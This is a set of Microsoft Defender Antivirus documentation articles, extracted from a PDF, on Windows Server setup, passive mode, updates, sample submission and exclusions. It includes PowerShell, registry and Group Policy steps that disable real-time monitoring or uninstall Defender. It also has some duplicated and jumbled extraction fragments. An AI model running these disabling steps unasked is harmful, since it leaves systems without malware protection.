Disabled or When disabled or uninstalled, Microsoft Defender Antivirus is not used. Files are
uninstalled not scanned, and threats are not remediated. In general, we do not recommend
disabling or uninstalling Microsoft Defender Antivirus.
To learn more, see Microsoft Defender Antivirus compatibility.
Check the state of Microsoft Defender Antivirus

on your device
You can use one of several methods, such as the Windows Security app or Windows
PowerShell, to check the state of Microsoft Defender Antivirus on your device.
） Important
Beginning with platform version 4.18.2208.0 and later: If a server has been
onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender"
group policy setting will no longer completely disable Windows Defender Antivirus
on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In
addition, the tamper protection feature will allow a switch to active mode but not
to passive mode.
If "Turn off Windows Defender" is already in place before onboarding to

Microsoft Defender for Endpoint, there will be no change and Defender
Antivirus will remain disabled.
To switch Defender Antivirus to passive mode, even if it was disabled before
onboarding, you can apply the ForceDefenderPassiveMode configuration
with a value of 1 . To place it into active mode, switch this value to 0 instead.
Note the modified logic for ForceDefenderPassiveMode when tamper protection is

enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper
protection will prevent it from going back into passive mode even when
ForceDefenderPassiveMode is set to 1 .
Use the Windows Security app to check the status of
1. On your Windows device, select the Start menu, and begin typing Security . Then
open the Windows Security app in the results.
3. Under Who's protecting me?, choose Manage Providers.
You'll see the name of your antivirus/antimalware solution on the security providers
page.
Use PowerShell to check the status of Microsoft Defender

Antivirus
1. Select the Start menu, and begin typing PowerShell . Then open Windows
PowerShell in the results.
2. Type Get-MpComputerStatus .
3. In the list of results, look at the AMRunningMode row.
Normal means Microsoft Defender Antivirus is running in active mode.
Passive mode means Microsoft Defender Antivirus running, but is not the
primary antivirus/antimalware product on your device. Passive mode is only
available for devices that are onboarded to Microsoft Defender for Endpoint
and that meet certain requirements. To learn more, see Requirements for
Microsoft Defender Antivirus to run in passive mode.
EDR Block Mode means Microsoft Defender Antivirus is running and

Endpoint detection and response (EDR) in block mode, a capability in
Microsoft Defender for Endpoint, is enabled. Check the
ForceDefenderPassiveMode registry key. If its value is 0, it is running in
normal mode; otherwise, it is running in passive mode.
SxS Passive Mode means Microsoft Defender Antivirus is running alongside

another antivirus/antimalware product, and limited periodic scanning is used.
 Tip
To learn more about the Get-MpComputerStatus PowerShell cmdlet, see the
reference article Get-MpComputerStatus.
 Tip


top scans per file
performance issues and apply remediation actions. See: Performance analyzer for
Get your antivirus/antimalware platform

updates
It's important to keep Microsoft Defender Antivirus (or any antivirus/antimalware
solution) up to date. Microsoft releases regular updates to help ensure that your devices
have the latest technology to protect against new malware and attack techniques. To
learn more, see Manage Microsoft Defender Antivirus updates and apply baselines.
 Tip

See also
Performance analyzer for Microsoft Defender Antivirus
Microsoft Defender Antivirus management and configuration
Evaluate Microsoft Defender Antivirus protection
 Tip
Feedback

Microsoft Defender Antivirus on
Windows Server
Article • 04/06/2023
Applies to:

Microsoft Defender Antivirus is available in the following editions/versions of Windows

Server:
Windows Server 2022

Windows Server 2019
Windows Server 2016
Windows Server 2012 R2 (Requires Microsoft Defender for Endpoint)
Setting up Microsoft Defender Antivirus on

Windows Server
The process of setting up and running Microsoft Defender Antivirus on Windows Server
1. Enable the interface.

2. Install Microsoft Defender Antivirus.
3. Verify Microsoft Defender Antivirus is running.
4. Update your antimalware Security intelligence.
5. (As needed) Submit samples.
6. (As needed) Configure automatic exclusions.
7. (Only if necessary) Set Windows Server to passive mode.
Enable the user interface on Windows Server
） Important
If you're using Windows Server 2012 R2, see Options to install Microsoft Defender
for Endpoint.
By default, Microsoft Defender Antivirus is installed and functional on Windows Server.
Sometimes, the user interface (GUI) is installed by default. The GUI isn't required; you
can use PowerShell, Group Policy, or other methods to manage Microsoft Defender
Antivirus. However, many organizations prefer to use the GUI for Microsoft Defender
Antivirus. To install the GUI, use one of the procedures in the following table:
ﾉ Expand table
Procedure What to do
Turn on the GUI using the 1. See Install roles, role services, and features by using the add
Add Roles and Features Roles and Features Wizard, and use the Add Roles and Features
Wizard Wizard.
2. When you get to the Features step of the wizard, under

Windows Defender Features, select the GUI for Windows
Defender option.
Turn on the GUI using 1. On your Windows Server, open Windows PowerShell as an
PowerShell administrator.
2. Run the following PowerShell cmdlet: Install-WindowsFeature

-Name Windows-Defender-GUI
For more information, see Getting Started with PowerShell.
Install Microsoft Defender Antivirus on

Windows Server
If you need to install or reinstall Microsoft Defender Antivirus on Windows Server, use
one of the procedures in the following table:
ﾉ Expand table
Use the Add Roles and Features 1. See Install or Uninstall Roles, Role Services, or Features,
Wizard to install Microsoft and use the Add Roles and Features Wizard.
Defender Antivirus
2. When you get to the Features step of the wizard, select the
Microsoft Defender Antivirus option. Also select the GUI for
Windows Defender option.
Use PowerShell to install 1. On your Windows Server, open Windows PowerShell as an

Microsoft Defender Antivirus administrator.
2. Run the following PowerShell cmdlet: Install-

WindowsFeature -Name Windows-Defender
７ Note
Event messages for the antimalware engine included with Microsoft Defender
Antivirus can be found in Microsoft Defender Antivirus Events.
Verify Microsoft Defender Antivirus is running

After you've installed (or reinstalled) Microsoft Defender Antivirus, your next step is to
verify that it's running. Use the PowerShell cmdlets in the following table:
ﾉ Expand table
Procedure PowerShell cmdlet
Verify that Microsoft Defender Antivirus is running Get-Service -Name windefend
Verify that firewall protection is turned on Get-Service -Name mpssvc
As an alternative to PowerShell, you can use Command Prompt to verify that Microsoft
Defender Antivirus is running. To do that, run the following command from a command
prompt:
sc query Windefend
The sc query command returns information about the Microsoft Defender Antivirus
service. When Microsoft Defender Antivirus is running, the STATE value displays
RUNNING .
To view all the services that aren't running, run the following PowerShell cmdlet:
sc query state= all

Update antimalware Security intelligence
） Important
on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In
addition, the tamper protection feature will allow a switch to active mode but not
to passive mode.

Microsoft Defender for Endpoint, there will be no change and Defender
Antivirus will remain disabled.
To switch Defender Antivirus to passive mode, even if it was disabled before
onboarding, you can apply the ForceDefenderPassiveMode configuration
with a value of 1 . To place it into active mode, switch this value to 0 instead.

protection will prevent it from going back into passive mode even when
To get your regular security intelligence updates, the Windows Update service must be
running. If you use an update management service, like Windows Server Update
Services (WSUS), make sure Microsoft Defender Antivirus Security intelligence updates
are approved for the computers you manage.
By default, Windows Update doesn't download and install updates automatically on

Windows Server 2019 or Windows Server 2022, or Windows Server 2016. You can
change this configuration by using one of the following methods:
ﾉ Expand table
Method Description
Windows Install updates automatically results in all updates being automatically

Update in installed, including Windows Defender Security intelligence updates.
Control Panel
Download updates but let me choose whether to install them allows
Method Description
Windows Defender to download and install Security intelligence updates

automatically, but other updates aren't automatically installed.
Group Policy You can set up and manage Windows Update by using the settings available
in Group Policy, in the following path: Administrative Templates\Windows
Components\Windows Update\Configure Automatic Updates
The AUOptions The following two values allow Windows Update to automatically download
registry key and install Security intelligence updates:
4 - Install updates automatically. This value results in all updates being

automatically installed, including Windows Defender Security intelligence
updates.
3 - Download updates but let me choose whether to install them. This value
allows Windows Defender to download and install Security intelligence
updates automatically, but other updates aren't automatically installed.
To ensure that protection from malware is maintained, enable the following services:
Windows Error Reporting service

Windows Update service
The following table lists the services for Microsoft Defender Antivirus and the dependent
services.
ﾉ Expand table
Service Name File Location Description
Windows Defender C:\Program Files\Windows This service is the main Microsoft

Service Defender\MsMpEng.exe Defender Antivirus service that
(WinDefend) needs to be running always.
Windows Error C:\WINDOWS\System32\svchost.exe -k This service sends error reports

Reporting Service WerSvcGroup back to Microsoft.
(Wersvc)
Windows Defender C:\WINDOWS\system32\svchost.exe -k We recommend keeping the

Firewall (MpsSvc) LocalServiceNoNetwork Windows Defender Firewall
service enabled.
Windows Update C:\WINDOWS\system32\svchost.exe -k Windows Update is needed to

(Wuauserv) netsvcs get Security intelligence updates
and antimalware engine updates
Submit samples
Sample submission allows Microsoft to collect samples of potentially malicious software.
To help provide continued and up-to-date protection, Microsoft researchers use these
samples to analyze suspicious activities and produce updated antimalware Security
intelligence. We collect program executable files, such as .exe files and .dll files. We don't
collect files that contain personal data, like Microsoft Word documents and PDF files.
Submit a file
1. Review the submission guide.
2. Visit the sample submission portal , and submit your file.
Enable automatic sample submission

To enable automatic sample submission, start a Windows PowerShell console as an
administrator, and set the SubmitSamplesConsent value data according to one of the
following settings:
ﾉ Expand table
Setting Description
0 - Always prompt The Microsoft Defender Antivirus service prompts you to confirm
submission of all required files. This is the default setting for Microsoft
Defender Antivirus, but isn't recommended for installations on Windows
Server 2016 or 2019, or Windows Server 2022 without a GUI.
1 - Send safe The Microsoft Defender Antivirus service sends all files marked as "safe" and
samples prompts for the remainder of the files.
automatically
2 - Never send The Microsoft Defender Antivirus service doesn't prompt and doesn't send
any files.
3 - Send all The Microsoft Defender Antivirus service sends all files without a prompt for
samples confirmation.
automatically
７ Note
This option is not available for Windows Server 2012 R2.

Configure automatic exclusions
To help ensure security and performance, certain exclusions are automatically added
based on the roles and features you install when using Microsoft Defender Antivirus on
Windows Server 2016 or 2019, or Windows Server 2022.
See Configure exclusions in Microsoft Defender Antivirus on Windows Server.
Passive mode and Windows Server

If you're using a non-Microsoft antivirus product as your primary antivirus solution on
Windows Server, you must set Microsoft Defender Antivirus to passive mode or disabled
mode manually. If your Windows Server endpoint is onboarded to Microsoft Defender
for Endpoint, you can set Microsoft Defender Antivirus to passive mode. If you're not
using Microsoft Defender for Endpoint, set Microsoft Defender Antivirus to disabled
mode.
 Tip
See Microsoft Defender Antivirus compatibility with other security products.
The following table describes methods to set Microsoft Defender Antivirus to passive
mode, disable Microsoft Defender Antivirus, and uninstall Microsoft Defender Antivirus:
ﾉ Expand table
Procedure Description
Set Microsoft Defender Set the ForceDefenderPassiveMode registry key as follows:

Antivirus to passive - Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat
mode by using a registry Protection
key - Name: ForceDefenderPassiveMode
- Type: REG_DWORD
- Value: 1
Turn off the Microsoft Open Windows PowerShell as an administrator, and run the following
Defender Antivirus user PowerShell cmdlet: Uninstall-WindowsFeature -Name Windows-
interface using Defender-GUI
PowerShell
Disable Microsoft Use the following PowerShell cmdlet: Set-MpPreference -

Defender Antivirus DisableRealtimeMonitoring $true
Realtime Protection
using PowerShell
Procedure Description
Disable Microsoft See Install or Uninstall Roles, Role Services, or Features, and use the
Defender Antivirus using Remove Roles and Features Wizard.
the Remove Roles and
Features wizard When you get to the Features step of the wizard, clear the Windows
Defender Features option.
If you clear Windows Defender by itself under the Windows Defender

Features section, you're prompted to remove the interface option GUI
for Windows Defender.
Microsoft Defender Antivirus runs normally without the user interface,

but the user interface can't be enabled if you disable the core
Windows Defender feature.
Uninstall Microsoft Use the following PowerShell cmdlet: Uninstall-WindowsFeature -Name

Defender Antivirus using Windows-Defender
PowerShell
Disable Microsoft In your Local Group Policy Editor, navigate to Administrative

Defender Antivirus using Template > Windows Component > Endpoint Protection > Disable
Group Policy Endpoint Protection, and then select Enabled > OK.
For more information, see Working with Registry Keys.
Are you using Windows Server 2012 R2 or Windows

Server 2016?
If your Windows Server is onboarded to Microsoft Defender for Endpoint, you can run
Microsoft Defender Antivirus in passive mode on Windows Server 2012 R2 and Windows
Server 2016. See the following articles:
Options to install Microsoft Defender for Endpoint
Microsoft Defender Antivirus compatibility with other security products
What happens if a non-Microsoft antivirus product is

uninstalled?
If a non-Microsoft antivirus product was installed on Windows Server, Microsoft
Defender Antivirus was probably set to passive mode. When the non-Microsoft antivirus
product is uninstalled, Microsoft Defender Antivirus should switch to active mode
automatically. However, that might not occur on certain versions of Windows Server,
such as Windows Server 2016. Use the following procedure to check the status of
Microsoft Defender Antivirus, and if necessary, set it to active mode:
1. Check the status of Microsoft Defender Antivirus by following the guidance in

Verify Microsoft Defender Antivirus is running (in this article).
2. If necessary, set Microsoft Defender Antivirus to active mode manually by

following these steps:
a. On your Windows Server device, open Registry Editor as an administrator.
b. Go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Advanced Threat Protection .
c. Set or define a REG_DWORD entry called ForceDefenderPassiveMode , and set its

value to 0 .
d. Reboot the device.
 Tip
If you still need help, see the following troubleshooting items:
Microsoft Defender Antivirus seems to be stuck in passive mode.

I'm having trouble re-enabling Microsoft Defender Antivirus on Windows
Server 2016.
See also
Microsoft Defender Antivirus in Windows
 Tip
Feedback

Enable and update Defender Antivirus
to the latest version on Windows Server
Article • 01/31/2024
Applies to:

If you wish to use Microsoft Defender Antivirus on your Windows Server, and it had
been previously disabled or uninstalled, you may need to take further steps to re-enable
it and ensure it's fully updated.
To enable and update Microsoft Defender Antivirus on Windows Server, perform the
following steps:
1. Install the latest Servicing Stack Update (SSU).
2. Install the latest cumulative update (LCU).
3. Reinstall Microsoft Defender Antivirus or re-enable it. For more information on

how to reinstall or re-enable Microsoft Defender Antivirus on Windows Server, see
Re-enable Microsoft Defender Antivirus on Windows Server if it was disabled and
Re-enable Microsoft Defender Antivirus on Windows Server if it was uninstalled.
4. Reboot the system.
5. Install the latest version of the platform update.
７ Note
Re-enabling Microsoft Defender Antivirus doesn't automatically install the

platform update. You can download and install the latest platform version
using Windows update. Alternatively, you can download the update package
from the Microsoft Update Catalog or from the Antimalware and cyber
security portal .
If you're preparing to install the modern, unified solution on Windows Server

2016, you can leverage the Installer help script to automate the platform
update and the subsequent installation and onboarding. This script can also
assist in re-enabling Microsoft Defender Antivirus.
Re-enable Microsoft Defender Antivirus on
Windows Server if it was disabled
First, ensure that Microsoft Defender Antivirus is not disabled either through Group
Policy or registry. For more information, see Troubleshoot Microsoft Defender Antivirus
while migrating from a third-party solution.
If Microsoft Defender Antivirus features and installation files were previously removed
from Windows Server 2016, follow the guidance in Configure a Windows Repair Source
to restore the feature installation files.
On Windows Server 2016, in some cases, you may need to use the Malware Protection
Command-Line Utility to re-enable Microsoft Defender Antivirus.
As a local administrator on the server, perform the following steps:
1. Open Command Prompt.

2. Run the following command: MpCmdRun.exe -wdenable .
3. Restart the device.
Re-enable Microsoft Defender Antivirus on

Windows Server if it was uninstalled
In case the Defender feature was uninstalled/removed, you can add it back.
As a local administrator on the server, perform the following steps:
1. Open Windows PowerShell.
2. Run the following commands:
PowerShell
# For Windows Server 2016

Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Features
Dism /Online /Enable-Feature /FeatureName:Windows-Defender
Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Gui
# For Windows Server 1803 and later, including Windows Server 2019 and
2022
Dism /Online /Enable-Feature /FeatureName:Windows-Defender
When the DISM command is being used within a task sequence running
PowerShell, the following path to cmd.exe is required.
PowerShell
C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature

/FeatureName:Windows-Defender-Features
C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature
/FeatureName:Windows-Defender
７ Note
You can also use Server Manager or PowerShell cmdlets to install the
Microsoft Defender Antivirus feature.
3. Reboot the system.
Related articles
 Tip
Feedback

Better together: Microsoft Defender
Antivirus and Microsoft Defender for
Endpoint
Article • 02/27/2024
Applies to:

Platforms
Windows
Microsoft Defender Antivirus is the next-generation protection component of Microsoft

Defender for Endpoint (Microsoft Defender for Endpoint).
Although you can use a non-Microsoft antivirus solution with Microsoft Defender for
Endpoint, there are advantages to using Microsoft Defender Antivirus together with
Defender for Endpoint. Not only is Microsoft Defender Antivirus an excellent next-
generation antivirus solution, but combined with other Defender for Endpoint
capabilities, such as endpoint detection and response and automated investigation and
remediation, you get better protection that's coordinated across products and services.
13 reasons to use Microsoft Defender Antivirus

together with Microsoft Defender for Endpoint
ﾉ Expand table
# Advantage Why it matters
1 Antivirus signal sharing Microsoft applications and services share signals across your
enterprise organization, providing a stronger single platform. See
Insights from the MITRE ATT&CK-based evaluation of Microsoft
Defender for Endpoint .
2 Threat analytics and Microsoft Defender Antivirus collects underlying system data used
your score for devices by threat analytics and Microsoft Secure Score for Devices. This
provides your organization's security team with more meaningful
information, such as recommendations and opportunities to

improve your organization's security posture.
3 Performance Microsoft Defender for Endpoint is designed to work with

Microsoft Defender Antivirus, so you get better performance
when you use these offerings together. Evaluate Microsoft
Defender Antivirus and Microsoft Defender for Endpoint.
4 Details about blocked More details and actions for blocked malware are available with
malware Microsoft Defender Antivirus and Microsoft Defender for
Endpoint. Understand malware & other threats.
5 Attack surface reduction Your organization's security team can reduce your vulnerabilities
(attack surfaces), giving attackers fewer ways to perform attacks.
Attack surface reduction uses cloud protection for a number of
rules. Get an overview of attack surface reduction.
6 Network protection Your organization's security team can protect your network by
blocking specific URLs and IP addresses. Protect your network.
7 Indicators, such as file, Your organization's security team can import threat intel, which
IP address, URL, and/or blocks known Indicators of Compromise (IoC's) Get an overview
certificate allow or of Indicator of compromise (IoC).
block indicators
8 File blocking Your organization's security team can block specific files. Stop and
quarantine files in your network.
9 Auditing events Auditing event signals are available in endpoint detection and
response capabilities. (These signals are not available with non-
Microsoft antivirus solutions.)
10 File recovery via If you are using Microsoft Defender Antivirus together with Office
OneDrive 365, and your device is attacked by ransomware, your files are
protected and recoverable. OneDrive Files Restore and Windows
Defender take ransomware protection one step further .
11 Controlled folder access Your organization's security team can reduce malware from
encrypting end-users data by preventing unknown applications or
services being able to write to protected folders. Get an overview
of controlled folder access.
12 Geographic data Compliant with ISO 270001 and data retention, geographic data is
provided according to your organization's selected geographic
sovereignty. See Compliance offerings: ISO/IEC 27001:2013
Information Security Management Standards.
13 Technical support By using Microsoft Defender for Endpoint together with Microsoft
Defender Antivirus, you have one company to call for technical
support. Troubleshoot service issuesand review event logs and

error codes with Microsoft Defender Antivirus.
 Tip

Learn More
 Tip
Feedback

Better together: Microsoft Defender
Antivirus and Office 365
Article • 10/24/2023
Applies to:

Microsoft 365
Platforms
Windows
You might already know that:
Microsoft Defender Antivirus protects your Windows device from software

threats, such as viruses, malware, and spyware. Microsoft Defender Antivirus is
your complete, ongoing protection, built into Windows 10 and Windows 11, and
ready to go. Microsoft Defender Antivirus is your next-generation protection.
Office 365 includes anti-malware, anti-spam, and anti-phishing protection. With

your Office 365 subscription, you get premium email and calendars, Office apps, 1
TB of cloud storage (via OneDrive), and advanced security across all your devices.
This is true for home and business users. And if you're a business user, and your
organization is using Office 365 E5, you get even more protection through
Microsoft Defender for Office 365. Microsoft Defender for Office 365 security
product overview.
OneDrive, included in Office 365, enables you to store your files and folders
online, and share them as you see fit. You can work together with people (for
work or fun), and coauthor files that are stored in OneDrive. You can also access
your files across all your devices (your PC, phone, and tablet). Manage sharing in
OneDrive.
But did you know there are good security reasons to use Microsoft Defender Antivirus
together with Office 365? Here are two:
1. You get ransomware protection and recovery.
2. Integration means better protection.

Read the following sections to learn more.
Ransomware protection and recovery

When you save your files to OneDrive, and Microsoft Defender Antivirus detects a
ransomware threat on your device, the following things occur:
1. You are told about the threat. (If your organization is using Microsoft Defender for
Endpoint, your security operations team is notified, too.)
2. Microsoft Defender Antivirus helps you (and your organization's security team)
remove the ransomware from your device(s). (If your organization is using
Microsoft Defender for Endpoint, your security operations team can determine
whether other devices are infected and take appropriate action, too.)
3. You get the option to recover your files in OneDrive. With the OneDrive Files
Restore feature, you can recover your files in OneDrive to the state they were in
before the ransomware attack occurred. See Ransomware detection and
recovering your files .
Think of the time and hassle this can save.
Integration means better protection

Microsoft Defender for Office 365 integrated with Microsoft Defender for Endpoint
means better protection for your organization. Here's how:
Microsoft Defender for Office 365 safeguards your organization against malicious
threats posed in email messages, email attachments, and links (URLs) in Office
documents.
AND
Microsoft Defender for Endpoint protects your devices from cyber threats, detects
advanced attacks and data breaches, automates security incidents, and improves
your security posture.
SO
Your security operations team can see a list of devices that are used by the
recipients of any detected URLs or email messages, along with recent alerts for
those devices, in the Microsoft Defender portal .
More good reasons to use OneDrive
Protection from ransomware is one great reason to put your files in OneDrive. And there
are several more good reasons, summarized in this video:
https://www.microsoft.com/en-us/videoplayer/embed/70b4d256-46fb-481f-ad9b-
921ef5fd7bed?postJsllMsg=true
 Tip

Want to learn more? See these resources:

OneDrive
 Tip
Feedback

Microsoft Safety Scanner Download
Article • 02/28/2024
Microsoft Safety Scanner is a scan tool designed to find and remove malware from
Windows computers. Simply download it and run a scan to find malware and try to
reverse changes made by identified threats.
Download Microsoft Safety Scanner (32-bit)
Download Microsoft Safety Scanner (64-bit)
７ Note
Safety Scanner is exclusively SHA-2 signed. Your devices must be updated to

support SHA-2 in order to run Safety Scanner. To learn more, see 2019 SHA-2 Code
Signing Support requirement for Windows and WSUS .
Important information
The security intelligence update version of the Microsoft Safety Scanner matches
the version described in this web page .
Microsoft Safety Scanner only scans when manually triggered. Safety Scanner
expires 10 days after being downloaded. To rerun a scan with the latest anti-
malware definitions, download and run Safety Scanner again. We recommend that
you always download the latest version of this tool before each scan.
Safety Scanner is a portable executable and doesn't appear in the Windows Start
menu or as an icon on the desktop. Note where you saved this download.
This tool doesn't replace your antimalware product. For real-time protection with
automatic updates, use Microsoft Defender Antivirus on Windows 11, Windows 10,
and Windows 8 or Microsoft Security Essentials on Windows 7 . These
antimalware products also provide powerful malware removal capabilities. If you're
having difficulties removing malware with these products, you can refer to our help
on removing difficult threats .
System requirements
Safety Scanner helps remove malicious software from computers running Windows 11,
Windows 10, Windows 10 Tech Preview, Windows 8.1, Windows 8, Windows 7, Windows
Server 2019, Windows Server 2016, Windows Server Tech Preview, Windows Server 2012
R2, Windows Server 2012, or Windows Server 2008 R2. For details, refer to the Microsoft
Lifecycle Policy.
How to run a scan

1. Download this tool and open it.
2. Select the type of scan that you want to run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view
the log at %SYSTEMROOT%\debug\msert.log.
To remove this tool, delete the executable file (msert.exe by default).
For more information about the Safety Scanner, see the support article on how to
troubleshoot problems using Safety Scanner .
Related resources
Troubleshooting Safety Scanner
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions
Feedback

Evaluate Microsoft Defender Antivirus
Article • 07/18/2023
Applies to:

Platforms
Windows
Use this guide to determine how well Microsoft Defender Antivirus protects you from
viruses, malware, and potentially unwanted applications. It explains the important next-
generation protection features of Microsoft Defender Antivirus available for both small
and large enterprises, and how they increase malware detection and protection across
your network.
You can choose to configure and evaluate each setting independently, or all at once. We
have grouped similar settings based upon typical evaluation scenarios, and include
instructions for using PowerShell to enable the settings.
The guide is available in PDF format for offline viewing:
Download the guide in PDF format
You can also download a PowerShell that will enable all the settings described in the
guide automatically. You can obtain the script alongside the PDF download above, or
individually from PowerShell Gallery:
Download the PowerShell script to automatically configure the settings
） Important
The guide is currently intended for single-machine evaluation of Microsoft

Defender Antivirus. Enabling all of the settings in this guide may not be suitable for
real-world deployment.
For the latest recommendations for real-world deployment and monitoring of

Microsoft Defender Antivirus across a network, see Deploy Microsoft Defender
Antivirus.
 Tip

Related topics
Microsoft Defender Antivirus in Windows 10
Deploy Microsoft Defender Antivirus
 Tip
Feedback

Configure Microsoft Defender Antivirus
features
Article • 02/18/2024
Applies to:

Platforms
Windows
You can configure Microsoft Defender Antivirus with a number of tools, such as:
Microsoft Defender for Endpoint Security Policy Management
Microsoft Intune
Microsoft Configuration Manager Tenant attach
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI) The following broad categories of

features can be configured:
Cloud-delivered protection. See Cloud-delivered protection and Microsoft

Defender Antivirus
Always-on real-time protection, including behavioral, heuristic, and machine

learning-based protection. See Configure behavioral, heuristic, and real-time
protection.
How end users interact with the client on individual endpoints. See the following
resources:
Prevent users from seeing or interacting with the Microsoft Defender Antivirus
user interface
Prevent or allow users to locally modify Microsoft Defender Antivirus policy
settings
 Tip
Review Reference topics for management and configuration tools. If you're

looking for Antivirus related information for other platforms, see:

 Tip


top scans per file
 Tip
Feedback

Manage exclusions for Microsoft
Defender for Endpoint and Microsoft
Defender Antivirus
Article • 08/07/2023
Applies to:

Platforms
Windows
７ Note
As a Microsoft MVP, Fabian Bader contributed to and provided material

feedback for this article.
Microsoft Defender for Endpoint includes a wide range of capabilities to prevent, detect,
investigate, and respond to advanced cyberthreats. These capabilities include Next-
generation protection (which includes Microsoft Defender Antivirus). As with any
endpoint protection or antivirus solution, sometimes files, folders, or processes that
aren't actually a threat can be detected as malicious by Defender for Endpoint or
Microsoft Defender Antivirus. These entities can be blocked or sent to quarantine, even
though they're not really a threat.
You can take certain actions to prevent false positives and similar issues from occurring.
These actions include:
Submitting a file to Microsoft for analysis

Suppressing an alert
Adding an exclusion or indicator
This article explains how these actions work, and describes the various types of
exclusions that can be defined for Defender for Endpoint and Microsoft Defender
Antivirus.
Ｕ Caution
Defining exclusions reduces the level of protection offered by Defender for
Endpoint and Microsoft Defender Antivirus. Use exclusions as a last resort, and
make sure to define only the exclusions that are necessary. Make sure to review
your exclusions periodically, and remove the ones you no longer need. See
Important points about exclusions and Common mistakes to avoid.
Submissions, suppressions, and exclusions

When you're dealing with false positives, or known entities that are generating alerts,
you don't necessarily need to add an exclusion. Sometimes classifying and suppressing
an alert is enough. We recommend submitting false positives (and false negatives) to
Microsoft for analysis as well. The following table describes some scenarios and what
steps to take with respect to file submissions, alert suppressions, and exclusions.
ﾉ Expand table
Scenario Steps to consider
False positive: An entity, such as a file or a 1. Review and classify alerts that were generated
process, was detected and identified as as a result of the detected entity.
malicious, even though the entity isn't a 2. Suppress an alert for a known entity.
threat. 3. Review remediation actions that were taken for
the detected entity.
4. Submit the false positive to Microsoft for
analysis.
5. Define an exclusion for the entity (only if
necessary).
Performance issues such as one of the 1. Collect diagnostic data for Microsoft Defender
following issues: Antivirus.
- A system is having high CPU usage or 2. If you're using a non-Microsoft antivirus
other performance issues. solution, check with the vendor for any needed
- A system is having memory leak issues. exclusions.
- An app is slow to load on devices. 3. Analyze the Microsoft Protection Log to see the
- An app is slow to open a file on devices. estimated performance impact.
4. Define an exclusion for Microsoft Defender
Antivirus (if necessary).
5. Create an indicator for Defender for Endpoint
(only if necessary).
Compatibility issues with non-Microsoft 1. If you're using a non-Microsoft antivirus

antivirus products. product as your primary antivirus/antimalware
Example: Defender for Endpoint relies on solution, set Microsoft Defender Antivirus to
security intelligence updates for devices, passive mode.
whether they're running Microsoft Defender 2. If you're switching from a non-Microsoft
antivirus/antimalware solution to Defender for
Scenario Steps to consider
Antivirus or a non-Microsoft antivirus Endpoint, see Make the switch to Defender for
solution. Endpoint. This guidance includes:
- Exclusions you might need to define for the non-
Microsoft antivirus/antimalware solution;
- Exclusions you might need to define for
Microsoft Defender Antivirus; and
- Troubleshooting information (just in case
something goes wrong while migrating).
） Important
An "allow" indicator is the strongest type of exclusion you can define in Defender
for Endpoint. Make sure to use indicators sparingly (only when necessary), and
review all exclusions periodically.
Submitting files for analysis

If you have a file that you think is wrongly detected as malware (a false positive), or a file
that you suspect might be malware even though it wasn't detected (a false negative),
you can submit the file to Microsoft for analysis. Your submission is scanned
immediately, and will then be reviewed by Microsoft security analysts. You're able to
check the status of your submission on the submission history page .
Submitting files for analysis helps reduce false positives and false negatives for all
customers. To learn more, see the following articles:
Submit files for analysis (available to all customers)

Submit files using the new unified submissions portal in Defender for Endpoint
(available to customers who have Defender for Endpoint Plan 2 or Microsoft
Defender XDR)
Suppressing alerts
If you're getting alerts in the Microsoft Defender portal for tools or processes that you
know aren't actually a threat, you can suppress those alerts. To suppress an alert, you
create a suppression rule, and specify what actions to take for that on other, identical
alerts. You can create suppression rules for a specific alert on a single device, or for all
alerts that have the same title across your organization.
To learn more, see the following articles:

Suppress alerts
Introducing the new alert suppression experience (for Defender for Endpoint)
Exclusions and indicators

Sometimes, the term exclusions is used to refer to exceptions that apply across Defender
for Endpoint and Microsoft Defender Antivirus. A more accurate way to describe these
exceptions is as follows:
Indicators for Defender for Endpoint; (which apply across Defender for Endpoint
and Microsoft Defender Antivirus); and
Exclusions for Microsoft Defender Antivirus.
The following table summarizes exclusion types that can be defined for Defender for
Endpoint and Microsoft Defender Antivirus.
 Tip
Defender for Endpoint Plan 1 is available as a standalone plan, and is

included in Microsoft 365 E3.
Defender for Endpoint Plan 2 is available as a standalone plan, and is
included in Microsoft 365 E5.
If you have Microsoft 365 E3 or E5, make sure to set up your Defender for
Endpoint capabilities.
ﾉ Expand table
Product/service Exclusion types
Microsoft Defender - Automatic exclusions (for active roles on Windows Server 2016 and later)
Antivirus - Built-in exclusions (for operating system files in Windows)
Defender for - Custom exclusions, such as process-based exclusions, folder location-
Endpoint Plan 1 or based exclusions, file extension exclusions, or contextual file and folder
Plan 2 exclusions
- Custom remediation actions based on threat severity or for specific
threats
The standalone versions of Defender for Endpoint Plan 1 and Plan 2 don't
include server licenses. To onboard servers, you need another license, such
as Microsoft Defender for Endpoint for Servers or Microsoft Defender for
Servers Plan 1 or 2. To learn more, see Defender for Endpoint onboarding
Windows Server.
Product/service Exclusion types
If you're a small or medium-sized business using Microsoft Defender for

Business, you can get Microsoft Defender for Business servers.
Defender for - Indicators for files, certificates, or IP addresses, URLs/domains

Endpoint Plan 1 or - Attack surface reduction exclusions
Plan 2 - Controlled folder access exclusions
Defender for Automation folder exclusions (for automated investigation and

Endpoint Plan 2 remediation)
The following sections describe these exclusions in more detail:
Microsoft Defender Antivirus exclusions

Defender for Endpoint indicators
Attack surface reduction exclusions
Controlled folder access exclusions
Automation folder exclusions (for automated investigation and remediation)

Microsoft Defender Antivirus exclusions can apply to antivirus scans and/or to real-time
protection. These exclusions include:
Automatic exclusions (for server roles on Windows Server 2016 and later)
Built-in exclusions (for operating system files in all versions of Windows)
Custom exclusions (for files and folders that you specify, if necessary)
Custom remediation actions (to determine what happens with detected threats)
Automatic exclusions
Automatic exclusions (also referred to as automatic server role exclusions) include
exclusions for server roles and features in Windows Server. These exclusions aren't
scanned by real-time protection but are still subject to quick, full, or on-demand
antivirus scans.
Examples include:
File Replication Service (FRS)

Hyper-V
SYSVOL
Active Directory
DNS Server
Print Server
Web Server
